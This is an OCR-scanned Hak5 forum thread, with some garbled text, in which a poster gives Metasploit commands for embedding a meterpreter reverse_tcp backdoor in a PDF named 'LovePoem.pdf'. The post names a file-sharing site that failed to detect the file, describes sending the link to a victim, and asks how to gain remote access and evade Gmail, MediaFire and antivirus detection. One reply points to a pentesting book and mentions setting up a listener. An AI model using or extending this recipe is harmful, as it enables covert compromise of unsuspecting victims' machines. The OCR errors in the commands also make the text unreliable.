22812017 Browse Forums Embedding a backdoor in a POF fle (torial + questions) - Metasploit Minute - HakS Forums Search Q Minute SAI Activity Embedding a backdoor in a Serine fatow his | Foor PDF file (tutorial + questions) By Zer0Gravity, April 28 in Metasploit Minute ¢ < Wak Zer0Gravity Newbie Members 1 post < < Posted April 28, Hello! In this post, | am going to tell you how | embedded a backdoor in 2 PDF file and uploaded onto the Internet. However, there are still some obscurities that | need YOUR help with: 1. Step: Preparation Download a random pdf file from the internet and save it to the "root directory" (Root directory ~> Go to ‘places’ and then "Home" and put it in there) 2. Step: Forging the backdoored file go to terminal and execute the command 'msfconsole" - after that, execute the command “use exploit/windows/fileformat/adobe_pdf_embedded_exe" ~ after that, execute the command “set payload windows/meterpreter/reverse_top" ~ after that, execute the command “set INFILENAME PutTheNameOfThePaffileAlongsideWithTheExtensionHere’ so for example: set INFILENAME book pdf ~ after that, execute the command “set FILENAME DesiredOutputFileName.paf" so for example: set FILENAME LovePoem.paf - after that, execute the command "set LHOST IpOfTheAttackerGoesHere(your ip)" ~ after that, execute the command ‘exploit’ hps:forums.hakSoritopic/40886-embedding-2-backdoor-i-a-pdl-fl-ttorial- questions! “4‘sepaizoi7 Embedding a backdoor in a POF fle (ural + questions) - Metasploit Minute - HakS Forums 3, Step: Locating our creation ‘After the backdoor has been successfully embedded to the PDF file, itis stored somewhere in the machine (it tells you where after the file is generated) Open up a terminal and execute “ed FileDestinationWithoutTheFileGoesHere" The output of the created file was: [4] Reading in '/root/book. pdf... [A] Parsing '/root/book pdf. 4] Using ‘windows/meterpreter/reverse_tcp’ as payload. [+] Parsing Successful. Creating ‘LovePoem.pdf file. [4] LovePoem pdf stored at /root/.msf4/local/LovePoem pdf So open up the terminal and type ed /roo/.msf4/local/" After this command is executed, it moves our directory to the specified path. Then, execute the command "Is" to list all the files inside the directory. 4. Step: Copying the file to desktop ‘After the file is located using the cd and Is commands, it has to be copied. ~ Execute the command: cp /root/.msf4/local/LovePoem.paf /root/Desktop/ 5, Step: Uploading the file on the web After the file is forged and retrieved to dekstop, it has to be uploaded to the internet, Popular file sharing networks such as MediaFire and Gmail have recognised the infected file, but a file sharing network called "SendSpace" didnt. You can easily upload the file there and send the link to the victim. So now I need your help, to answer me to these questions: 1 After the victim has downloaded the file (Ie’s assume that the antivirus hasn't detected it), how can I gain a remote access to it? (which commands do | need to execute ete. 2. How can | prevent the infected file from being detected by Gmail and Mediafire? 3. How can | prevent the infeted file from being detected by the anti virus? | appreciate all the time taken to read this post or answer any of the questions D hps:forums.hakSoritopic/40886-embedding-2-backdoor-i-a-pdl-fl-ttorial- questions! 21622812017 Embedding a backdoor in a POF fle (torial + questions) - Metasploit Minute - HakS Forums wutanglan Posted June 26 Newbie If this machine has modern Windows packages, | would bet my life the above file that gets extracted will be detected by an AV solution. There are ways to attempt to make it undetected which you can look into. | recommend Georgia Weidman's book: "Penetration Testing: A hands on Introduction to hacking" for further info. She covers the whole process of using metasploit in a fundamental ‘Active Members way and bypassing AV, and also how it's done. I would look into more in WHY 6 posts these exploits / payloads work instead of how to reach a specific goal. Also, in order for you to access the target machine, you will need to setup a listener on your own machine. Create an account or sign in to comment You need to be a member in order to leave a comment Create an account Signin ‘Sign up for a new account in our community. It's Already have an account? Sign in here. easy! amano Register anew accoun f ign in with Faceboo y Sign in with Twitter G0 To TOPIC LISTING Metasploit Minute vf Gm 3 Owe ® RECENTLY BROWSING 0 MEMBERS hups:forums.hakSorltopc/40886-embedding-2-backdoor-i-a-pdl-fl-tutorial- questions! 3822812017 Embedding a backdoor in a POF fle (torial + questions) - Metasploit Minute - HakS Forums No registered users viewing this page. ft Home > Haké asploit Minu 4ak5 LLC Powered by Invision Community htps:forums.hakSorltopc/40886-embedding-e-backdoor-i-a-pdl-fl-tutorial- questions! A All Activity 418